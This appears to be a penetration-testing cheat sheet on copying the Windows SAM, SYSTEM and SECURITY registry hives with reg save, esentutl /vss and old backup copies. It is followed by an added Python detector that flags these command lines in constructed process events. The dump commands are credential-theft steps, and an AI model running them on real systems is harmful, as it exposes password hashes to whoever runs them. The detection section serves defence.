Dumping registry hives

Reg.exe utility

Built-in Windows utility

reg save hklm\system system
reg save hklm\security security
reg save hklm\sam sam

Esentutl.exe utility

Built-in Windows binary

esentutl.exe /y /vss C:\Windows\System32\config\SYSTEM /d c:\temp\SYSTEM
esentutl.exe /y /vss C:\Windows\System32\config\SECURITY /d c:\temp\security
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam

VSSshadow.exe utility

Backups

In some scenarios, registry hives are backed up to C:\Windows\Repair\*. This is worth checking, but the copies will likely be out of date.

E.g. C:\Windows\Repair\SAM
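All three techniques on this page (reg save of HKLM\SAM, HKLM\SYSTEM and HKLM\SECURITY, esentutl /vss against the live hive files under System32\config, and reads of the stale copies under C:\Windows\Repair) leave distinctive process command lines behind, which is what a blue team hunts for. The following is an added detection example written for this page, not code from the original page or its author: it parses a handful of constructed process-creation events in a simplified key=value format loosely modelled on Sysmon Event ID 1 / Security 4688 fields (the format, the rule names and the usernames are assumptions for illustration) and flags the three patterns described above while ignoring benign reg.exe and esentutl.exe use.

```python
import re
from dataclasses import dataclass

# Constructed sample events in a simplified "Image=... CommandLine=... User=..."
# layout. Real Sysmon / 4688 telemetry carries more fields; this is not real data.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\reg.exe CommandLine=reg save hklm\sam sam User=CORP\jdoe",
    r"Image=C:\Windows\System32\esentutl.exe CommandLine=esentutl.exe /y /vss C:\Windows\System32\config\SECURITY /d c:\temp\security User=NT AUTHORITY\SYSTEM",
    r"Image=C:\Windows\System32\cmd.exe CommandLine=copy C:\Windows\Repair\SAM c:\temp\sam.bak User=CORP\jdoe",
    r"Image=C:\Windows\System32\reg.exe CommandLine=reg query hklm\software\microsoft\windows\currentversion\run User=CORP\jdoe",
    r"Image=C:\Windows\System32\esentutl.exe CommandLine=esentutl.exe /p C:\Users\jdoe\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat User=CORP\jdoe",
]

# Matches the constructed layout above; returns None for anything else.
EVENT_RE = re.compile(r"Image=(?P<image>\S+) CommandLine=(?P<cmd>.*) User=(?P<user>.+)$")


@dataclass
class Finding:
    rule: str          # hypothetical rule name, chosen for this example
    user: str
    command_line: str


def parse_event(line):
    """Split one constructed event line into (image, command line, user)."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return m.group("image"), m.group("cmd"), m.group("user")


def detect_hive_dump(line):
    """Return a Finding if the event matches one of the hive-dump patterns, else None."""
    parsed = parse_event(line)
    if parsed is None:
        return None
    image, cmd, user = parsed
    exe = image.rsplit("\\", 1)[-1].lower()
    cmd_l = cmd.lower()

    # Rule 1: reg.exe save/export targeting one of the credential-bearing hives.
    if exe == "reg.exe" and re.search(r"\b(save|export)\b", cmd_l):
        if re.search(r"hklm\\(sam|system|security)\b", cmd_l):
            return Finding("reg_save_sensitive_hive", user, cmd)

    # Rule 2: esentutl.exe using /vss to copy a live hive file out of System32\config.
    # Plain esentutl use (e.g. /p on a WebCache database) is routine and not flagged.
    if exe == "esentutl.exe" and "/vss" in cmd_l:
        if re.search(r"\\system32\\config\\(sam|system|security)\b", cmd_l):
            return Finding("esentutl_vss_hive_copy", user, cmd)

    # Rule 3: any process referencing the backup hive copies under C:\Windows\Repair.
    if re.search(r"\\windows\\repair\\(sam|system|security)\b", cmd_l):
        return Finding("repair_dir_hive_access", user, cmd)

    return None


def scan(lines):
    """Run the detector over a list of event lines and collect the findings."""
    return [f for f in (detect_hive_dump(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] user={finding.user!r} cmd={finding.command_line!r}")
```

The three matching rules deliberately key on the hive name and the source path rather than on the tool alone, because reg.exe and esentutl.exe are both legitimately common on workstations; pairing the binary with the SAM/SYSTEM/SECURITY target keeps the rule specific enough to page on. In a real deployment the same logic maps directly onto a SIEM query over the process command-line field.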


Last updated 4 years ago
